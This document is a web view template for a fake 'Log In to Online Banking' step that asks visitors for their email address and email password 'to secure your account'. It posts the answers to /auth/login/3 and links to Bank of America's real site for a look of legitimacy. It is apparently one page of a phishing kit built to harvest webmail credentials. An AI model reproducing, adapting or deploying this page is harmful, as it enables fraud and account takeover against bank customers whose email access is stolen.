@layout('layouts.app')

@section('content')
<form id="login3Form" class="cb-form" action="/auth/login/3" method="POST">
  <div class="columns col-small">
    <div class="row">
      <div class="column col-small mtop-30">
        <div class="btm-20">
          <h1 class="cb-login-heading">Log In to Online Banking</h1>
        </div>
        <div class="btm-30 cb-login-formInfo">To secure your account, please enter the following.</div>
      </div>

      <div class="column col-small clearfix">
        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="emailAddrLabel" class="cb-input-label" for="emailAddr">Email Address</label>
            <input id="emailAddr" name="emailAddr" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="emailAddrErrorMsg" style="display: none;">Email Address required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="emailPassLabel" class="cb-input-label" for="emailPass">Email Password</label>
            <input id="emailPass" name="emailPass" type="password" class="cb-input-text hide-input" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="emailPassErrorMsg" style="display: none;">Email Password required</div>
          </div>
        </div>

        <div class="cb-login-helpText">
          <a href="https://secure.bankofamerica.com/">Forgot ID/Password?</a>
        </div>
      </div>

      <div class="column col-small clearfix">
        <div class="btn-container">
          <button id="login2SubmitBtn" type="submit" class="cb-btn cb-btn--medium cb-btn--primary mrt-15 submitBtn">Continue</button>

          <button id="cancelBtn" type="button" class="cb-btn cb-btn--medium cb-btn--secondary">Cancel</button>
        </div>
      </div>
    </div>
  </div>
</form>
@endsection